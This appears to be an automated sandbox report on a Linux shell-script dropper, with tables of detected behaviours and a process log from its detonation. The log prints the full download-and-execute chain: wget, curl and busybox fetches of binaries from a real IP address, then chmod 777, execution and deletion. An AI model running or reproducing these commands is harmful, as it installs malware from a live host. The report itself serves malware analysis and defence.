Analysis Overview
SHA256
77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb
Threat Level: Shows suspicious behavior
The file 77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 02:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 02:53
Reported
2024-11-20 02:55
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
12s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
| N/A | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | N/A |
| N/A | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | N/A |
| N/A | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | N/A |
| N/A | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | N/A |
| N/A | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | N/A |
| N/A | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | N/A |
| N/A | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | N/A |
| N/A | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | N/A |
| N/A | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | N/A |
| N/A | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | N/A |
| N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | N/A |
| N/A | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | N/A |
| N/A | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq | /usr/bin/curl | N/A |
Processes
/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh
[/tmp/77fa3f4917be2f66cb783171a3cf1c2503a25d6e4d419f6c00633d18ea183afb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
[chmod 777 irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/tmp/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh
[./irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/rm
[rm irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/wget
[wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/chmod
[chmod 777 r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/tmp/r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq
[./r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/bin/rm
[rm r0o0vPWjxxAxwoWwBA0X4F2SBoiBdX8Nuq]
/usr/bin/wget
[wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/chmod
[chmod 777 HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/tmp/HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1
[./HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/bin/rm
[rm HWktezg1QoXrei15Qb5ywGlEQhCz0dtHf1]
/usr/bin/wget
[wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/chmod
[chmod 777 kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/tmp/kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU
[./kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/bin/rm
[rm kEBfaeqZHzHahQF4iZoSKJaZ4hkyxdyDbU]
/usr/bin/wget
[wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/chmod
[chmod 777 XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/tmp/XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1
[./XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/bin/rm
[rm XWnTofUZBuY6bhuucXYWc0PIsu4fI6qkY1]
/usr/bin/wget
[wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/chmod
[chmod 777 f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/tmp/f4er80WdZpB65CEraApSmbUBPranpIfNx7
[./f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/bin/rm
[rm f4er80WdZpB65CEraApSmbUBPranpIfNx7]
/usr/bin/wget
[wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/chmod
[chmod 777 Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/tmp/Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT
[./Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/bin/rm
[rm Sim6VIYZo6hKObGdzr05K6iUacFhmoNJrT]
/usr/bin/wget
[wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/chmod
[chmod 777 edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/tmp/edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC
[./edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/bin/rm
[rm edJ1Oq5OEBELuhUmNxAGcftYlnaaeY76nC]
/usr/bin/wget
[wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/chmod
[chmod 777 K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/tmp/K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4
[./K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/bin/rm
[rm K5rRRJhKMCAansNjl5Omy4qMczaFZjCVs4]
/usr/bin/wget
[wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/chmod
[chmod 777 QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/tmp/QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f
[./QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/bin/rm
[rm QOb4IWDazgJI7V87zUNYE2vMbo0iA0DP9f]
/usr/bin/wget
[wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/chmod
[chmod 777 PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/tmp/PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY
[./PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/bin/rm
[rm PTfOwWWsenJ482RktQbSLEsi0P87S4JMgY]
/usr/bin/wget
[wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/chmod
[chmod 777 XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/tmp/XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl
[./XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/bin/rm
[rm XHa7wGLNPoxU2GjDBkN8uFLylZor4nV2Yl]
/usr/bin/wget
[wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/chmod
[chmod 777 Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/tmp/Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw
[./Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/bin/rm
[rm Gdylg4xq1BQirQxV3oUy7HvV8IEl3g3ipw]
/usr/bin/wget
[wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/chmod
[chmod 777 VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/tmp/VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY
[./VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/bin/rm
[rm VhO2ASRFIUiaeg3eSzwnyggKzaLdliiuoY]
/usr/bin/wget
[wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/irxMRueKtUIlbAD2saAWDAmbCGXWYBdjbh]
/bin/chmod
